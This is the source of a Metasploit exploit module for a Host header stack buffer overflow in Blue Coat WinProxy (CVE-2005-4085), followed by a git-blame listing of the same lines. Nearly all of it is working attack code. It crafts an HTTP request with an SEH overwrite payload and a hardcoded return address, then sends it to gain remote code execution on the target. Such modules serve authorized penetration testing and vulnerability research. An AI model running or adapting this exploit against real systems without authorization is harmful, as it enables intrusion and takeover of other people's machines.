modules/exploits/windows/proxy/bluecoat_winproxy_host.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  HttpFingerprint = { :method => 'HEAD', :pattern => [ /BlueCoat/ ] }

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Blue Coat WinProxy Host Header Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in the Blue Coat Systems WinProxy
          service by sending a long port value for the Host header in a HTTP
          request.
        },
        'Author' => 'MC',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2005-4085'],
          ['OSVDB', '22238'],
          ['BID', '16147'],
          ['URL', 'http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html'],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          'Space' => 600,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'WinProxy <= 6.1 R1a Universal', { 'Ret' => 0x6020ba04 } ], # Asmdat.dll
        ],
        'Privileged' => true,
        'DisclosureDate' => '2005-01-05',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(80)
      ]
    )
  end

  def exploit
    connect

    print_status("Trying target #{target.name}...")

    sploit = "GET / HTTP/1.1" + "\r\n"
    sploit += "Host: 127.0.0.1:"
    sploit += rand_text_english(31, payload_badchars)
    seh = generate_seh_payload(target.ret)
    sploit[23, seh.length] = seh
    sploit += "\r\n\r\n"

    sock.put(sploit)
    sock.get_once(-1, 3)

    handler
    disconnect
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = GreatRanking`
Code from MC 2006-01-08 06:26:30 +00:00
add more http fingerprints -- thx mc 2010-07-12 23:25:31 +00:00			`HttpFingerprint = { :method => 'HEAD', :pattern => [ /BlueCoat/ ] }`

This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Remote::Seh`
Code from MC 2006-01-08 06:26:30 +00:00
			`def initialize(info = {})`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Blue Coat WinProxy Host Header Overflow',`
			`'Description' => %q{`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This module exploits a buffer overflow in the Blue Coat Systems WinProxy`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`service by sending a long port value for the Host header in a HTTP`
			`request.`
			`},`
			`'Author' => 'MC',`
			`'License' => MSF_LICENSE,`
			`'References' => [`
Code from MC 2006-01-08 06:26:30 +00:00			`['CVE', '2005-4085'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '22238'],`
More modules from MC 2006-09-12 05:58:09 +00:00			`['BID', '16147'],`
			`['URL', 'http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html'],`
Code from MC 2006-01-08 06:26:30 +00:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'DefaultOptions' => {`
Code from MC 2006-01-08 06:26:30 +00:00			`'EXITFUNC' => 'thread',`
			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Payload' => {`
			`'Space' => 600,`
Code from MC 2006-01-08 06:26:30 +00:00			`'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",`
			`'StackAdjustment' => -3500,`
			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Platform' => 'win',`
			`'Targets' => [`
Code from MC 2006-01-08 06:26:30 +00:00			`[ 'WinProxy <= 6.1 R1a Universal', { 'Ret' => 0x6020ba04 } ], # Asmdat.dll`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Privileged' => true,`
			`'DisclosureDate' => '2005-01-05',`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DefaultTarget' => 0,`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
Code from MC 2006-01-08 06:26:30 +00:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`register_options(`
			`[`
			`Opt::RPORT(80)`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`]`
			`)`
Code from MC 2006-01-08 06:26:30 +00:00			`end`

			`def exploit`
			`connect`

			`print_status("Trying target #{target.name}...")`

Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`sploit = "GET / HTTP/1.1" + "\r\n"`
Code from MC 2006-01-08 06:26:30 +00:00			`sploit += "Host: 127.0.0.1:"`
updated modules to use base class rand_xxx methods 2007-03-01 08:21:36 +00:00			`sploit += rand_text_english(31, payload_badchars)`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`seh = generate_seh_payload(target.ret)`
Code from MC 2006-01-08 06:26:30 +00:00			`sploit[23, seh.length] = seh`
			`sploit += "\r\n\r\n"`

			`sock.put(sploit)`
			`sock.get_once(-1, 3)`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00
Code from MC 2006-01-08 06:26:30 +00:00			`handler`
			`disconnect`
			`end`
More osvdb references from Steve Tornio 2009-05-13 17:39:42 +00:00			`end`